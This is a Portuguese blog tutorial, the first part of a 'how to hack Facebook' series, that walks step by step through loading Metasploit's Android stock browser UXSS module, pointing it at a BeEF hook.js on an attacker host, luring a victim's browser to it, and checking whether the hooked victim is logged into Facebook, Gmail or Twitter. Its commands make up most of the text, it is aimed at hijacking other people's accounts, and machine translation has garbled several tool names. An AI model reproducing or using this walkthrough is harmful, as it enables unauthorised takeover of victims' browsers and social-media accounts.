Como Hackear Facebook – Parte 1


Este é o post inicial de uma nova série sobre como hackear Facebook . É importante notar aqui que cada hack que vou mostrar é muito específico. Por isso e preciso que fique claro que: não há BALA DE PRATA que funciona em todas as circunstâncias. Obviamente, as pessoas Atentas no Facebook tomaram precauções para garantir que sua conta não seja invadia, mas se formos criativos, persistentes e engenhosos, ainda podemos conseguir.

O Facebook é uma das aplicações mais seguras da Internet e, apesar do que você pode ler na Internet, não é fácil de hackear. Além disso, a maioria desses sites na Internet dispostos a vender um hack de Facebook são fraudes. Não lhes dê um centavo!

Se você quiser hackear Facebook, você precisa investir algum tempo na aprendizagem. Se você é novo em hacking, você pode querer começar com meu artigo ” Como usar bytes nulos para estudar para se tornar um hacker profissional “.

Além disso, quero dizer umas palavras sobre o que queremos dizer com a palavra “hack”. Em alguns casos, podemos obter a senha que, é claro, nos dará acesso completo à conta do Facebook. Em outros casos, podemos ter acesso à conta sem quaisquer direitos. Ainda em outros esquemas, podemos obter os cookies que o Facebook coloca no navegador do usuário e, em seguida, colocá-lo em nosso navegador para acessar a conta sempre que quisermos. Em outro cenário, podemos colocar-nos entre o usuário e o Facebook em uma forma de ataque MitM, para obter a senha, etc.

Nesta primeira entrada nesta série , usaremos uma falha no navegador web do stock Android que nos dará acesso à conta do Facebook. Espero que não seja preciso dizer que esse hack só funcionará quando o usuário tiver acessado sua conta do Facebook no navegador do Android e não no aplicativo móvel do Facebook. Embora o Google esteja ciente desta falha de segurança em seu navegador, ele não é automaticamente corrigido ou substituído em sistemas existentes. Como resultado, este hack funcionará na maioria dos sistemas Android.

Política de mesma origem
A política de mesma origem (SOP) é ​​uma das principais medidas de segurança que cada navegador deve atender. O que significa é que os navegadores são projetados para que as páginas da web não possam carregar o código que não é parte de seu próprio recurso. Isso evita que os invasores injetem o código sem a autorização do proprietário do site.

Infelizmente, o navegador Android padrão pode ser hackeado, pois não impõe a política SOP adequadamente. Desta forma, um invasor pode acessar as outras páginas do usuário que estão abertas no navegador, entre outras coisas. Isso significa que se conseguirmos que o usuário navegue até nosso site e depois envie-lhes algum código mal-intencionado, podemos acessar outros sites abertos em seu navegador, como o Facebook.

Para aqueles de vocês são novatos em hackear, recomendo que comece instalando o Kali Linux . Neste hack, precisaremos de duas ferramentas, Metasploit e BeEF , ambas incorporadas ao nosso sistema Kali Linux.

Passo 1 Abrir Metasploit
Vamos começar por acender Kali e depois abrir o Metasploit digitando:

Kali> msfconsole

Você deve obter uma tela como essa.

Para aqueles que não estão familiarizados com o Metasploit, confira essa série sobre o Metasploit para obter mais informações sobre como uslo com sucesso.

Passo 2 Encontre o Exploit

Em seguida, vamos encontrar o exploit para esse hack digitando:

msf > search platform:android stock browser

Quando fazemos isso, recebemos apenas um módulo:

auxiliary/gather/android_stock_browser_uxss

Vamos carregar esse módulo digitando:

msf > use auxiliary/gather/android_stock_browser_uxss

Passo 3 Obter as informações
Agora que carregamos o módulo, vamos receber algumas informações sobre este módulo. Podemos fazer isso digitando:

Msf> info

Como você pode ver a partir desta página de informações, este exploit funciona contra todos os navegadores do Android antes do Android 4.4 KitKat. Ele nos diz que este módulo nos permite executar JavaScript arbitrário no contexto do URL.

Passo 4 Mostrar opções
Em seguida, deixe ver quais as opções que precisamos definir para que este módulo funcione. Mais importante, precisamos configurar o REMOTE_JS que destaquei abaixo.

Passo 5 Open BeEF
Agora, abra BeEF. Por favor, veja este tutorial sobre o uso do BeEF , se você não conhece a ferramenta.

Passo 6 Set JS para BeEF Hook

Volte para o Metasploit agora. Precisamos configurar o REMOTE_JS no hook no BeEF. Claro, certifique-se de usar o IP do servidor no qual o BeIFE está sendo executado.

Msf> set REMOTE_JS http://192.168.1.107:3000/hook.js

Em seguida, precisamos configurar o URIPATH para o diretório raiz / . Digite:

Msf> set uripath /

Passo 7 Execute o servidor
Agora precisamos iniciar o servidor web Metasploit. O que acontecerá agora é que o Metasploit iniciará seu servidor web e servirá o hook Beeb para que, quando alguém navegue para esse site, ele terá seu navegador ligado ao BeEF.

msf > run

Passo 8 Navegue para o site a partir de um navegador de Android
Agora estamos replicando o comportamento da vítima. Quando eles navegam para o site que hospeda o hook, ele automaticamente injetará o JavaScript em seu navegador e ganhará. Então, precisamos usar o navegador nativo em um dispositivo Android e ir para 192.168.1.107:8080, ou qualquer que seja o IP do seu site.

Passo 9 Hook Browser
Quando o usuário / dispositivo visita o nosso servidor web em 192.168.1.107, o JavaScript do BeGRO irá ligar seu navegador. Ele será exibido no navegador “Hooked Browser” no BeEF. Agora controlamos seu navegador!

Etapa 10 Detectar se o navegador está autenticado no Facebook
Agora vamos voltar para BeEF e vá para a guia “Comandos”. Sob a pasta “Rede” encontramos o comando “Detectar Redes Sociais”. Este comando verificará se a vítima é autenticada no Gmail, no Facebook ou no Twitter. Clique no botão “Executar” no canto inferior direito.

Quando fizermos isso, Beef retornará para nós os resultados. Como você pode ver abaixo, a Beeb retornou para nós que este usuário em particular não foi autenticado no Gmail ou no Facebook, mas foi autenticado no Twitter.

Agora, precisamos simplesmente esperar até que o usuário seja autenticado no Facebook e tente novamente esse comando. Uma vez que eles se autenticaram no Facebook, podemos direcionar uma guia para abrir a página do Facebook do usuário, o que faremos no nosso próximo tutorial de hack do Facebook.

Continuaremos a explorar mais formas de hackear o Facebook, Twitter e Gmail em futuros artigos, então continue voltando,hackers de facebook!

Comentários

Esta publicação atualmente tem uma resposta

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Barra lateral